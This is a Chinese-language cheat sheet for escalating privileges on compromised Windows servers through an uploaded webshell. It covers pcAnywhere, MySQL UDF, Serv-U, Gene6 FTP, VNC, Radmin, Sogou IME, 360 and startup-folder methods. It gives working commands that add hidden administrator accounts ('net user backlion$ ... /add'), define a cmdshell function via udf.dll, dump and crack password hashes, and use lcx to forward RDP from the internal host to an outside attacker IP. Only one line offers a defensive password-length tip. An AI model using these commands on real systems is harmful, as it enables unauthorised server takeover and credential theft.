pcAnywhere提權:
1.利用pcAnywhere提權,前提條件是pcAnywhere默認安裝到默認路徑,以及它的目錄安全權限有users權限,如果管理員刪除了users和power users用戶的目錄權限,只剩下administer和system用戶目錄權限,則無法提權;
2.在webshll的大馬中查找到pcanywhere目錄里的host目錄,里面的cif文件保存了連接pcanywhere的賬戶和密碼,然后下載下來,通過PcAnywhere密碼破解工具進行破解密碼,然后再自己的電腦上安裝pcanywhere,然后通過連接到另一台電腦進行遠程桌面連接;
——————————–
利用HASH破解提權:
1.工具:ophcrack-win32-installer-3.3.0(hash破解軟件) ,Pwdump7(查看hash的軟件),彩虹表(密碼字典)
2.思路:滲透,管理員可能幾台服務器都實用同個密碼,我們獲取其他一個以后可以嘗試登陸
其他服務器
3.例如添加一個用戶並將該用戶添加到管理員組:net user backlion 123456 /add
net localgroup administrators backlion /add
4.在dos下用pwdump7運行查看該用戶的hash值:backlion:1003:2FB6717FC6897581AAD3B435B51404EE:DA0492D72F8D04983188CCD4CA257E44:::
5.然后通過ophcrack和彩虹表進行破解該用戶
6.防范:密碼超過14位就不能破解,建議密碼設置15位,越復雜越好
————————————————
MYSQL提權(udf.dll):
1.用的文件有su.php木馬,Linx Mysql BackDoor.php木馬
1.udf.dll的默認路徑:C:\Winnt\udf.dll(win2000系統),C:\Windows\udf.dll (win2003系統)
2.找到網站目錄mysql配置文件,常用的有:config.php,web.php,webconfig.php
配置文件如下:
$dbhost = ‘localhost’; // 數據庫服務器 就是127.0.0.1
$dbuser = ‘root’; // 數據庫用戶名
$dbpw = ‘a’; // 數據庫密碼
$dbname = ‘dz’; // 數據庫名
3.在su.php中,填入host:127.0.0.1 user:root passwor:a db:mysql,然后輸入sql命令進行添加用戶:select state(“net user backlion 123 /add & net localgroup administrators backlion /add”)
然后通過net user查看是否添加成功
4.在udf.ph 中host:127.0.0.1 user:root passwor:a db:mysql,然后填入DLL導出路徑:C:\Windows\udf.dll ,在sql命令中輸入一下命令:
create function cmdshell returns string soname ‘udf.dll’//添加一個udf.dll組件函數
select cmdshell(‘net user backlion$ 123456 /add’); //添加一個用戶
select cmdshell(‘net localgroup administrators backlion$ /add’); //將用戶添加到管理員組
select cmdshell(‘c:\3389.exe’); //這個是把開3389的文件放到C盤,然后運行
drop function cmdshell; //刪除函數
select cmdshell(‘netstat -an’); //這是查看端口查開放情況
———————————————————————-
Churrasco提權:
1.用到的工具有:win2003 0day漏洞工具03.exe和cmd.exe;
2.然后在webshell中上傳我們的03.exe和cmd.exe到可以讀寫的目錄中,然后切換到可讀寫的目錄中:然后在webshll路徑中填入我們的cmd.exe路徑如;c :/recyle/cmd.exe 下面填入:c :/recyle/03.exe “net user backlion 123 /add & net localgroup adminstrators backlion /add”
————————————————————————————–
利用sogou輸入法(6.0)提權:
1.sogou輸入法是6.0版本,然后我們通過webshll木馬管理,查找到sogou安裝的路徑,然后通過上傳
ImeUtil.exe 替換原來的ImeUtil.exe文件,只要一加載這個程序就會在系統中自動添加管理員
用戶名:sunwear 密碼:sunwear
————————————————————
lcx內網端口轉化,解決在內網不能遠程桌面登錄:
1.webshll目標站點的wscript組件開啟,並且有一個可讀寫的目錄,一般上傳到c:/recyle目錄下
2.上傳我們的cmd.exe和lcx.exe上去
3.然后在shll路徑中填入:c:/recyle/cmd.exe 下面就輸入c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1 3389
4.在本地DOS下輸入: d:/lcx.exe listen 51 3333 監聽51並轉發到3333端口
4.在本地遠程桌面里面輸入:127.0.0.1:3333
———————————————
6Gftp提權:
1.默認安裝目錄C:\Program Files\Gene6 FTP Server
2.密碼保存文件的路徑是在C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini
其配置文件如下:
[Server]
IP=127.0.0.1,8021\r\n //使用的端口號
GrantAllAccessToLocalHost=0
[Acct=Administrator] //用戶名
Enabled=1
Rights=0
Password=21232F297A57A5A743894A0E4A801FC3 //md5密碼
3.在webshll中發現了有安裝g6ftp軟件,默認安裝路徑
4.在shll中輸入:C:\recycler\lcx.exe -tran 8022 127.0.0.1 8021
6.在本地安裝6gftp軟件,IP地址輸入:目標站點IP地址。端口號為8022,用戶名為administrator,密碼為破解出來的md5值;
——————————————–
Serv-U6.4提權:
1.serv-u的密鑰:9dK4g4iPhvOsoEY9nprEiSsmW7OUqFaGuwHT1CtBn9K6hQVg0bd2okQ9ldel+1IGE9b4xDP0q2W+vE4vgZLA7unm6t3CxTI
2.在serv-u中下面的命令中輸入:cmd /c net user backlion$ 123 /add & net localgroup administrators backlion$ /add
3.然后就添加了一個用戶名
4.就可以用這個賬號遠程桌面登錄了;
—————————————————-
VNC密碼的破解和提權:
1在webshll中讀取vnc注冊表鍵值:RealVNC的注冊表路徑:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password
UltraVNC的注冊表路徑:
HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password
讀取的是十進制數,需要轉換成十六進制如下:
十六進制:D7 51 CC 73 31 24 7A 93
十進制: 12 7C EF FA 6E 0B 7A D9
3.破解vnc密碼:vncpwdump.exe D751CC7331247A93
4.然后在本地安裝一個VNC客戶端,進行遠程連接
—————————————————————-
Radmin提權:
1.在webshll中檢查出有安裝Radmin程序;
2.在讀取Radmin注冊表鍵值,然后把讀取的十進制轉換成16進制;
3.直接用radmi-hash工具連接,把讀取的十六進制填入進去;
4.最后可以用radmin客戶端連接就行了;
————————————————–
360安全衛士提權:
1.上傳我們的cmd.exe和360.exe到可讀寫的目錄下如:c:/recyle
2.在shell中輸入:c:/recyle/cmd.exe 然后在下面輸入:c:/recyle/360.exe sethc
3.然后遠程桌面登錄輸入目標IP地址,過一會就彈出了一個DOS窗口,然后就可以添加用戶名和密碼
———————————————————————————
啟動項提取:
1.在webshll中上傳一個添加用戶的批處理文件如:net user backlion$ 123456 /add & net localgroup adminsitrators backlion$ /add
爆出為系統修復.bat;
2.然后在wegshll中輸入啟動選的路徑:C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動 上傳我們的批處理文件;
3.只要管理員下次重新啟動機子,就能自動添加我們的賬號;